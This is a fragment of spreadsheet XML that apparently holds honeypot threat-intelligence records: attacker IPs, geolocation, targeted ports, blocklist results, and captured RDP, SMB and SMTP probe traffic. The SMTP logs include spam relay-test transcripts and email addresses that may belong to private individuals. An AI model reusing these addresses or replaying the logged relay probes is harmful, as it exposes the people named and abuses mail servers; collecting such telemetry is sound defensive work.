3&amp;&amp;42379&amp;&amp;52648&amp;&amp;33326&amp;&amp;35940&amp;&amp;47896&amp;&amp;49250&amp;&amp;50905&amp;&amp;54364&amp;&amp;52220&amp;&amp;39999&amp;&amp;49382&amp;&amp;57508&amp;&amp;33042&amp;&amp;42476&amp;&amp;54564&amp;&amp;62408&amp;&amp;63108&amp;&amp;29032&amp;&amp;28954&amp;&amp;59574&amp;&amp;59774&amp;&amp;30085&amp;&amp;57642&amp;&amp;54098&amp;&amp;36418&amp;&amp;61956&amp;&amp;59245&amp;&amp;44329&amp;&amp;56918&amp;&amp;42479&amp;&amp;30969&amp;&amp;46293&amp;&amp;24371&amp;&amp;24990&amp;&amp;53967&amp;&amp;38195&amp;&amp;20889&amp;&amp;23441&amp;&amp;31482&amp;&amp;50367&amp;&amp;46656&amp;&amp;60932&amp;&amp;65067&amp;&amp;54060&amp;&amp;56678&amp;&amp;42511&amp;&amp;23107&amp;&amp;53366&amp;&amp;30672&amp;&amp;48576&amp;&amp;49865&amp;&amp;64943&amp;&amp;45359&amp;&amp;56356&amp;&amp;57205&amp;&amp;59931&amp;&amp;52183&amp;&amp;50814&amp;&amp;29385&amp;&amp;40451&amp;&amp;47947&amp;&amp;58709&amp;&amp;52734&amp;&amp;59343&amp;&amp;49296&amp;&amp;58623&amp;&amp;42573&amp;&amp;60580&amp;&amp;56765&amp;&amp;63735&amp;&amp;64549&amp;&amp;31982&amp;&amp;59857&amp;&amp;57563&amp;&amp;61928&amp;&amp;60688&amp;&amp;51834&amp;&amp;54199&amp;&amp;57975&amp;&amp;65038&amp;&amp;20998&amp;&amp;60417&amp;&amp;28800&amp;&amp;20871&amp;&amp;38095&amp;&amp;40074&amp;&amp;64865&amp;&amp;50454&amp;&amp;25781&amp;&amp;53836&amp;&amp;27805&amp;&amp;22147&amp;&amp;55064&amp;&amp;30081&amp;&amp;62162&amp;&amp;61688&amp;&amp;38922&amp;&amp;50084&amp;&amp;61884&amp;&amp;61195&amp;&amp;43534&amp;&amp;48084&amp;&amp;57995&amp;&amp;35648&amp;&amp;47863&amp;&amp;60627&amp;&amp;45022&amp;&amp;49454&amp;&amp;63483&amp;&amp;60539&amp;&amp;35058&amp;&amp;56519&amp;&amp;63814&amp;&amp;62247&amp;&amp;54163&amp;&amp;51494&amp;&amp;54742&amp;&amp;59591&amp;&amp;28273&amp;&amp;63600&amp;&amp;49621&amp;&amp;61852&amp;&amp;48737&amp;&amp;44471&amp;&amp;30155&amp;&amp;47358&amp;&amp;54770&amp;&amp;28771&amp;&amp;27748&amp;&amp;37616&amp;&amp;63539&amp;&amp;60256&amp;&amp;23964&amp;&amp;35706&amp;&amp;58400&amp;&amp;36611&amp;&amp;41397&amp;&amp;58594&amp;&amp;60397&amp;&amp;50801&amp;&amp;58286&amp;&amp;50614&amp;&amp;29503&amp;&amp;60679&amp;&amp;51877&amp;&amp;59507&amp;&amp;48015&amp;&amp;45500&amp;&amp;39871&amp;&amp;64018&amp;&amp;56653&amp;&amp;64395&amp;&amp;23037&amp;&amp;59638&amp;&amp;57887&amp;&amp;54322&amp;&amp;34121&amp;&amp;57316&amp;&amp;52854&amp;&amp;63506&amp;&amp;56839&amp;&amp;62421&amp;&amp;28121&amp;&amp;47893&amp;&amp;49694&amp;&amp;43155&amp;&amp;49445&amp;&amp;51099&amp;&amp;48169&amp;&amp;54369&amp;&amp;63711&amp;&amp;32037&amp;&amp;52949&amp;&amp;47433&amp;&amp;57683&amp;&amp;62661&amp;&amp;40625&amp;&amp;57693&amp;&amp;57655&amp;&amp;62390&amp;&amp;54943&amp;&amp;53738&amp;&amp;63692&amp;&amp;58824&amp;&amp;54614&amp;&amp;55289&amp;&amp;52930&amp;&amp;52393&amp;&amp;62703&amp;&amp;65282&amp;&amp;50503&amp;&amp;39314&amp;&amp;44327&amp;&amp;32180&amp;&amp;55939&amp;&amp;44593&amp;&amp;47434&amp;&amp;62889&amp;&amp;35208&amp;&amp;21626&amp;&amp;60295&amp;&amp;63873&amp;&amp;40001&amp;&amp;51797&amp;&amp;57078&amp;&amp;58577&amp;&amp;57389&amp;&amp;41999&amp;&amp;43856&amp;&amp;37502&amp;&amp;47890&amp;&amp;57304&amp;&amp;50802&amp;&amp;61020&amp;&amp;57530&amp;&amp;21348&amp;&amp;55752&amp;&amp;61544&amp;&amp;23790&amp;&amp;27004&amp;&amp;30120&amp;&amp;46251&amp;&amp;42509&amp;&amp;46806&amp;&amp;52971&amp;&amp;37514&amp;&amp;26767&amp;&amp;23271&amp;&amp;31695&amp;&amp;62130&amp;&amp;54822&amp;&amp;38018&amp;&amp;42931&amp;&amp;46186&amp;&amp;54030&amp;&amp;49907&amp;&amp;59190&amp;&amp;61071&amp;&amp;54958&amp;&amp;51509&amp;&amp;49323&amp;&amp;44528&amp;&amp;39498&amp;&amp;50879&amp;&amp;43710&amp;&amp;37597&amp;&amp;62409&amp;&amp;52544&amp;&amp;23216&amp;&amp;31830&amp;&amp;36867&amp;&amp;54285&amp;&amp;50769&amp;&amp;61012&amp;&amp;36273&amp;&amp;51238&amp;&amp;55919&amp;&amp;31463&amp;&amp;28755&amp;&amp;53503&amp;&amp;44648&amp;&amp;51781&amp;&amp;52691&amp;&amp;62346&amp;&amp;51776&amp;&amp;54127&amp;&amp;56265&amp;&amp;57853&amp;&amp;37674&amp;&amp;62795&amp;&amp;53990&amp;&amp;55814&amp;&amp;63765&amp;&amp;52693&amp;&amp;36422&amp;&amp;59410&amp;&amp;54804&amp;&amp;59079&amp;&amp;50807&amp;&amp;65080&amp;&amp;44076&amp;&amp;62624&amp;&amp;47882&amp;&amp;59673&amp;&amp;62077&amp;&amp;29272&amp;&amp;57551&amp;&amp;36513&amp;&amp;61258&amp;&amp;51843&amp;&amp;65268&amp;&amp;49116&amp;&amp;54896&amp;&amp;59112&amp;&amp;65472&amp;&amp;61050&amp;&amp;37034&amp;&amp;60990&amp;&amp;48494&amp;&amp;65147&amp;&amp;55776&amp;&amp;42140&amp;&amp;65208&amp;&amp;61594&amp;&amp;56307&amp;&amp;63864&amp;&amp;21670&amp;&amp;59362&amp;&amp;65179&amp;&amp;54368&amp;&amp;60558&amp;&amp;52141&amp;&amp;60009&amp;&amp;33216&amp;&amp;53992&amp;&amp;58799&amp;&amp;61522&amp;&amp;52899&amp;&amp;63212&amp;&amp;49916&amp;&amp;42372&amp;&amp;28840&amp;&amp;63290&amp;&amp;54506&amp;&amp;63659&amp;&amp;51955&amp;&amp;38298&amp;&amp;59503&amp;&amp;54371&amp;&amp;45177&amp;&amp;62683&amp;&amp;53848&amp;&amp;29848&amp;&amp;53292&amp;&amp;41467&amp;&amp;62579&amp;&amp;53635&amp;&amp;28165&amp;&amp;63518&amp;&amp;54096&amp;&amp;49743&amp;&amp;50964&amp;&amp;25042&amp;&amp;61292&amp;&amp;47725&amp;&amp;61476&amp;&amp;34850&amp;&amp;58113&amp;&amp;49634&amp;&amp;52849&amp;&amp;29882&amp;&amp;64309&amp;&amp;60161&amp;&amp;36920&amp;&amp;23651&amp;&amp;34988&amp;&amp;60261&amp;&amp;56953&amp;&amp;62136&amp;&amp;20911&amp;&amp;57629&amp;&amp;55034&amp;&amp;51489&amp;&amp;50142&amp;&amp;63429&amp;&amp;60340&amp;&amp;65265&amp;&amp;63799&amp;&amp;49892&amp;&amp;53340&amp;&amp;34898&amp;&amp;51327&amp;&amp;61784&amp;&amp;28398&amp;&amp;26676&amp;&amp;52336&amp;&amp;53502&amp;&amp;62972&amp;&amp;58728&amp;&amp;63272&amp;&amp;54743&amp;&amp;63990&amp;&amp;54670&amp;&amp;57149&amp;&amp;29414&amp;&amp;27550&amp;&amp;42074&amp;&amp;20733&amp;&amp;62398&amp;&amp;51088&amp;&amp;57406&amp;&amp;61223&amp;&amp;49198&amp;&amp;32984&amp;&amp;32699&amp;&amp;23845&amp;&amp;48477&amp;&amp;56249&amp;&amp;24792&amp;&amp;56146&amp;&amp;49993&amp;&amp;27473&amp;&amp;21353&amp;&amp;52997&amp;&amp;53628&amp;&amp;52598&amp;&amp;53138&amp;&amp;54996&amp;&amp;36743&amp;&amp;56877&amp;&amp;55830&amp;&amp;24015&amp;&amp;50617&amp;&amp;59511&amp;&amp;44357&amp;&amp;55222&amp;&amp;23635&amp;&amp;53311&amp;&amp;63917&amp;&amp;41377&amp;&amp;61793&amp;&amp;39913&amp;&amp;46555&amp;&amp;43890&amp;&amp;47693&amp;&amp;50056&amp;&amp;45978&amp;&amp;46740&amp;&amp;55213&amp;&amp;25336&amp;&amp;64481&amp;&amp;52247&amp;&amp;63382&amp;&amp;59550&amp;&amp;34492&amp;&amp;38723&amp;&amp;56836&amp;&amp;63887&amp;&amp;46655&amp;&amp;49978&amp;&amp;23769&amp;&amp;35844&amp;&amp;58737&amp;&amp;54983&amp;&amp;52146&amp;&amp;21954&amp;&amp;34432&amp;&amp;21841&amp;&amp;38815&amp;&amp;23868&amp;&amp;60639&amp;&amp;21566&amp;&amp;40566&amp;&amp;46647&amp;&amp;54365&amp;&amp;51424&amp;&amp;59113&amp;&amp;29096&amp;&amp;36546&amp;&amp;51008&amp;&amp;53915&amp;&amp;24657&amp;&amp;33799&amp;&amp;53648&amp;&amp;49224&amp;&amp;63343&amp;&amp;58216&amp;&amp;64261&amp;&amp;63056</t>
  </si>
  <si>
    <t>{Data_PJL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;NA&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hello'}}</t>
  </si>
  <si>
    <t>::ffff:cab3:5c4b</t>
  </si>
  <si>
    <t>5c8de93a876a24b9ad88f1439b7a7890</t>
  </si>
  <si>
    <t>43.242.117.83</t>
  </si>
  <si>
    <t>::ffff:2bf2:7553</t>
  </si>
  <si>
    <t>67f316eff8919fcb95321c2097b4d11e</t>
  </si>
  <si>
    <t>150.242.16.147</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H5&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;62071&amp;&amp;1433&amp;&amp;445</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (150.242.16.147,57970)}&amp;&amp;{Data_SMB:Incoming connection (150.242.16.147,62110)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (150.242.16.147,62528)}&amp;&amp;{Data_SMB:Incoming connection (150.242.16.147,64048)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:96f2:1093</t>
  </si>
  <si>
    <t>e4fff53da0884223508667d00f6d9ffa</t>
  </si>
  <si>
    <t>111.248.26.13</t>
  </si>
  <si>
    <t>111-248-26-13.dynamic-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:6ff8:1a0d</t>
  </si>
  <si>
    <t>dceff7ef422a659dd23fb727123aa955</t>
  </si>
  <si>
    <t>46.119.178.144</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SOCKS5_H11&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_LDAP_H16&amp;&amp;SMA-LAB_IPP_H16&amp;&amp;SMA-LAB_HTTPS_H14&amp;&amp;SMA-LAB_SMB_H22&amp;&amp;SMA-LAB_SSH_H36&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H24</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1080&amp;&amp;80&amp;&amp;5900&amp;&amp;389&amp;&amp;631&amp;&amp;443&amp;&amp;445&amp;&amp;22&amp;&amp;40928&amp;&amp;NA&amp;&amp;23&amp;&amp;43678&amp;&amp;19871</t>
  </si>
  <si>
    <t>::ffff:2e77:b290</t>
  </si>
  <si>
    <t>c02c61d284653518df9c7d849d6a938f</t>
  </si>
  <si>
    <t>59.184.62.132</t>
  </si>
  <si>
    <t>::ffff:3bb8:3e84</t>
  </si>
  <si>
    <t>e61fe1898aa52de6abb7bf4460f49383</t>
  </si>
  <si>
    <t>61.3.47.36</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_SMB_H12</t>
  </si>
  <si>
    <t>{Data_TELNET:NA}&amp;&amp;{Data_SMB:Incoming connection (61.3.47.36,52359)}&amp;&amp;{Data_SMB:Incoming connection (61.3.47.36,52405)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.3.47.36,52946)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:3d03:2f24</t>
  </si>
  <si>
    <t>37399f054259aff6b0c0a5f0a171baa3</t>
  </si>
  <si>
    <t>178.242.211.86</t>
  </si>
  <si>
    <t>Eskişehir</t>
  </si>
  <si>
    <t>315202</t>
  </si>
  <si>
    <t>39.7667</t>
  </si>
  <si>
    <t>30.5256</t>
  </si>
  <si>
    <t>::ffff:b2f2:d356</t>
  </si>
  <si>
    <t>db77e2994c1d455d9e18c2eb3061d547</t>
  </si>
  <si>
    <t>117.235.60.5</t>
  </si>
  <si>
    <t>::ffff:75eb:3c05</t>
  </si>
  <si>
    <t>42c32b06d4ae6c81a13e22991c829512</t>
  </si>
  <si>
    <t>61.2.149.244</t>
  </si>
  <si>
    <t>::ffff:3d02:95f4</t>
  </si>
  <si>
    <t>be197ce89ff8db6b3f6bf79c731760a8</t>
  </si>
  <si>
    <t>36.225.192.23</t>
  </si>
  <si>
    <t>36-225-192-23.dynamic-ip.hinet.net</t>
  </si>
  <si>
    <t>::ffff:24e1:c017</t>
  </si>
  <si>
    <t>6f355573a67dcbaf394f38cda73fd0f1</t>
  </si>
  <si>
    <t>122.161.196.150</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H31&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;26145&amp;&amp;1433&amp;&amp;3306</t>
  </si>
  <si>
    <t>New Delhi (Jasola Vihar)</t>
  </si>
  <si>
    <t>28.5385</t>
  </si>
  <si>
    <t>77.2905</t>
  </si>
  <si>
    <t>::ffff:7aa1:c496</t>
  </si>
  <si>
    <t>b2afd69ac25abb045b1ac87faefd8cbd</t>
  </si>
  <si>
    <t>103.135.222.212</t>
  </si>
  <si>
    <t>2019-03-01</t>
  </si>
  <si>
    <t>::ffff:6787:ded4</t>
  </si>
  <si>
    <t>c01a62b348054e3eede70a616955747d</t>
  </si>
  <si>
    <t>121.173.142.5</t>
  </si>
  <si>
    <t>5900&amp;&amp;44378&amp;&amp;53440&amp;&amp;52971&amp;&amp;52490&amp;&amp;52011&amp;&amp;3389&amp;&amp;49704&amp;&amp;49258&amp;&amp;65211&amp;&amp;64774&amp;&amp;64385&amp;&amp;63999&amp;&amp;62438&amp;&amp;62001&amp;&amp;61563&amp;&amp;61129&amp;&amp;59626&amp;&amp;59194&amp;&amp;58763&amp;&amp;58331&amp;&amp;58405&amp;&amp;58014&amp;&amp;57622&amp;&amp;63185&amp;&amp;62748&amp;&amp;62307&amp;&amp;61854&amp;&amp;60712&amp;&amp;60213&amp;&amp;59711&amp;&amp;59210&amp;&amp;50492&amp;&amp;49979&amp;&amp;49457&amp;&amp;65338&amp;&amp;50026&amp;&amp;49538&amp;&amp;65448&amp;&amp;64973&amp;&amp;63030&amp;&amp;56956&amp;&amp;50106&amp;&amp;59642&amp;&amp;52788&amp;&amp;53055&amp;&amp;62608&amp;&amp;55804&amp;&amp;65350&amp;&amp;51461&amp;&amp;61041&amp;&amp;54281&amp;&amp;63868&amp;&amp;60698&amp;&amp;53939&amp;&amp;63517&amp;&amp;55082&amp;&amp;64660&amp;&amp;57902&amp;&amp;51150&amp;&amp;60740&amp;&amp;65531&amp;&amp;58769&amp;&amp;52005&amp;&amp;61582&amp;&amp;54829&amp;&amp;62552&amp;&amp;55811&amp;&amp;65440&amp;&amp;58983&amp;&amp;52770&amp;&amp;63738&amp;&amp;56998&amp;&amp;50261&amp;&amp;53148&amp;&amp;62947&amp;&amp;56210&amp;&amp;49433&amp;&amp;59082&amp;&amp;52353&amp;&amp;54272&amp;&amp;63877&amp;&amp;57142&amp;&amp;50405&amp;&amp;60023&amp;&amp;53287&amp;&amp;53641&amp;&amp;62907&amp;&amp;56169&amp;&amp;49401&amp;&amp;59058&amp;&amp;52325&amp;&amp;56492&amp;&amp;49765&amp;&amp;59460&amp;&amp;52744&amp;&amp;62390&amp;&amp;58605&amp;&amp;51894&amp;&amp;61538&amp;&amp;54840&amp;&amp;64480&amp;&amp;57777&amp;&amp;59114&amp;&amp;52370&amp;&amp;61977&amp;&amp;55245&amp;&amp;62742&amp;&amp;62826&amp;&amp;50926&amp;&amp;64943&amp;&amp;51097&amp;&amp;54548&amp;&amp;52918&amp;&amp;55806&amp;&amp;64615&amp;&amp;60439&amp;&amp;55572&amp;&amp;57597&amp;&amp;55240&amp;&amp;58815&amp;&amp;59961&amp;&amp;62137&amp;&amp;63036&amp;&amp;50510&amp;&amp;65392&amp;&amp;60979&amp;&amp;60899&amp;&amp;63970&amp;&amp;50650&amp;&amp;53531&amp;&amp;53478&amp;&amp;56461&amp;&amp;56556&amp;&amp;59396&amp;&amp;59600&amp;&amp;53455&amp;&amp;56436&amp;&amp;56609&amp;&amp;59584&amp;&amp;59529&amp;&amp;62528&amp;&amp;62575&amp;&amp;65356&amp;&amp;49346&amp;&amp;51680&amp;&amp;52631&amp;&amp;61530&amp;&amp;54812&amp;&amp;64431&amp;&amp;57720&amp;&amp;51014&amp;&amp;60634&amp;&amp;53934&amp;&amp;49248&amp;&amp;56478&amp;&amp;63686&amp;&amp;61757&amp;&amp;58576&amp;&amp;49430&amp;&amp;56706&amp;&amp;63948&amp;&amp;54845&amp;&amp;61228&amp;&amp;52133&amp;&amp;59388&amp;&amp;50287&amp;&amp;57532&amp;&amp;50427&amp;&amp;57695&amp;&amp;64957&amp;&amp;55874&amp;&amp;63146&amp;&amp;51777&amp;&amp;59119&amp;&amp;50099&amp;&amp;57473&amp;&amp;64820&amp;&amp;55828&amp;&amp;63176&amp;&amp;57931&amp;&amp;65251&amp;&amp;56225&amp;&amp;63558&amp;&amp;54545&amp;&amp;61790&amp;&amp;63051&amp;&amp;54035&amp;&amp;61374&amp;&amp;52362&amp;&amp;61594&amp;&amp;52569&amp;&amp;59900&amp;&amp;50876&amp;&amp;65527&amp;&amp;58202&amp;&amp;56493&amp;&amp;59534&amp;&amp;50504&amp;&amp;65171&amp;&amp;56141&amp;&amp;63464&amp;&amp;58244&amp;&amp;49174&amp;&amp;56527&amp;&amp;63854&amp;&amp;54822&amp;&amp;56881&amp;&amp;64201&amp;&amp;55179&amp;&amp;62519&amp;&amp;53505&amp;&amp;60861&amp;&amp;51841&amp;&amp;64212&amp;&amp;55199&amp;&amp;62546&amp;&amp;53542&amp;&amp;60890&amp;&amp;51875&amp;&amp;53627&amp;&amp;60951&amp;&amp;51926&amp;&amp;59258&amp;&amp;50228&amp;&amp;57551&amp;&amp;64882&amp;&amp;54570&amp;&amp;61921&amp;&amp;52907&amp;&amp;60269&amp;&amp;51261&amp;&amp;49567&amp;&amp;58608&amp;&amp;57482&amp;&amp;64813&amp;&amp;55788&amp;&amp;63120&amp;&amp;54103&amp;&amp;61438&amp;&amp;52422</t>
  </si>
  <si>
    <t>{Data_VNC:NA}&amp;&amp;NA&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hello'}}</t>
  </si>
  <si>
    <t>::ffff:79ad:8e05</t>
  </si>
  <si>
    <t>b10f3ae11680314f3085a7f01ad120af</t>
  </si>
  <si>
    <t>104.245.240.52</t>
  </si>
  <si>
    <t>Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Session Manipulation&amp;&amp;Credential Stuffing</t>
  </si>
  <si>
    <t>SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_SMTP_H29</t>
  </si>
  <si>
    <t>South Carolina</t>
  </si>
  <si>
    <t>Charleston</t>
  </si>
  <si>
    <t>North Charleston</t>
  </si>
  <si>
    <t>4589387</t>
  </si>
  <si>
    <t>29405</t>
  </si>
  <si>
    <t>32.867</t>
  </si>
  <si>
    <t>-79.9752</t>
  </si>
  <si>
    <t>2024-01-04</t>
  </si>
  <si>
    <t>VITALKEY-NETWORK</t>
  </si>
  <si>
    <t>2025-03-24</t>
  </si>
  <si>
    <t>{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000D_
To: spameri@tiscali.it_x000D_
Date: Tue, 1 Apr 2025 05:33:37 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;info@usa.com&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;mammamwilson@proton.me&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;momoh130@hotmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;rubenconvy41@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;thoma1699@yahoo.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;NA&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '45.14.244.111_x000D_
To: spameri@tiscali.it_x000D_
Date: Tue, 8 Apr 2025 09:02:22 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '122.170.7.108_x000D_
To: spameri@tiscali.it_x000D_
Date: Tue, 8 Apr 2025 17:04:59 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;xx@usa.COM&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;ubenconvy41@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}</t>
  </si>
  <si>
    <t>::ffff:68f5:f034</t>
  </si>
  <si>
    <t>54d0e69d0e09df21ec1b6666df2ffb07</t>
  </si>
  <si>
    <t>117.193.95.64</t>
  </si>
  <si>
    <t>::ffff:75c1:5f40</t>
  </si>
  <si>
    <t>f8afecba882cb8f8e5c08a59e513d017</t>
  </si>
  <si>
    <t>61.0.143.207</t>
  </si>
  <si>
    <t>::ffff:3d00:8fcf</t>
  </si>
  <si>
    <t>15cc734c03cbf02d91e1808439b0e9c0</t>
  </si>
  <si>
    <t>223.230.3.153</t>
  </si>
  <si>
    <t>UPPAL-HYDRABAD-AP</t>
  </si>
  <si>
    <t>::ffff:dfe6:399</t>
  </si>
  <si>
    <t>35032e6930cfc7de84e6ae4e35bb0f78</t>
  </si>
  <si>
    <t>117.214.61.221</t>
  </si>
  <si>
    <t>::ffff:75d6:3ddd</t>
  </si>
  <si>
    <t>50ed572acadfb45062dcb9056efcbddb</t>
  </si>
  <si>
    <t>115.240.183.77</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_LDAP_H43&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;54463&amp;&amp;445&amp;&amp;389&amp;&amp;22882&amp;&amp;1433</t>
  </si>
  <si>
    <t>::ffff:73f0:b74d</t>
  </si>
  <si>
    <t>219744c7d1e6212c9ba7636862ada512</t>
  </si>
  <si>
    <t>113.160.208.153</t>
  </si>
  <si>
    <t>::ffff:71a0:d099</t>
  </si>
  <si>
    <t>d825bfbf2690949dd5c174fc9d1e797e</t>
  </si>
  <si>
    <t>109.120.137.63</t>
  </si>
  <si>
    <t>::ffff:6d78:893f</t>
  </si>
  <si>
    <t>ab058cf63d842cb89a1efd1593f2404a</t>
  </si>
  <si>
    <t>61.63.157.155</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_SSH_H16&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_LDAP_H45&amp;&amp;SMA-LAB_SSH_H47&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_PJL_H27&amp;&amp;SMA-LAB_VNC_H42&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H5</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;44611&amp;&amp;18338&amp;&amp;80&amp;&amp;389&amp;&amp;22&amp;&amp;445&amp;&amp;9100&amp;&amp;5900&amp;&amp;13868&amp;&amp;38015&amp;&amp;NA</t>
  </si>
  <si>
    <t>9676</t>
  </si>
  <si>
    <t>SaveCom Internation Inc.</t>
  </si>
  <si>
    <t>Savecom International Inc.</t>
  </si>
  <si>
    <t>SAVECOM</t>
  </si>
  <si>
    <t>::ffff:3d3f:9d9b</t>
  </si>
  <si>
    <t>a7ef8b5722911652da110c8bc9123143</t>
  </si>
  <si>
    <t>61.0.198.150</t>
  </si>
  <si>
    <t>::ffff:3d00:c696</t>
  </si>
  <si>
    <t>e3ede527514fa04be75c140533217f77</t>
  </si>
  <si>
    <t>106.214.233.138</t>
  </si>
  <si>
    <t>::ffff:6ad6:e98a</t>
  </si>
  <si>
    <t>c7147f5db72e33e80817bd7af5a00e78</t>
  </si>
  <si>
    <t>113.160.100.129</t>
  </si>
  <si>
    <t>SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1</t>
  </si>
  <si>
    <t>445&amp;&amp;3306&amp;&amp;1433</t>
  </si>
  <si>
    <t>{'b.barracudacentral.org': ['unknown']&amp;&amp; 'cbl.abuseat.org': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown'&amp;&amp; 'exploits']}</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (113.160.100.129,32916)}</t>
  </si>
  <si>
    <t>::ffff:71a0:6481</t>
  </si>
  <si>
    <t>e33628d0485a62ddf4283035bae5d4ee</t>
  </si>
  <si>
    <t>117.198.9.89</t>
  </si>
  <si>
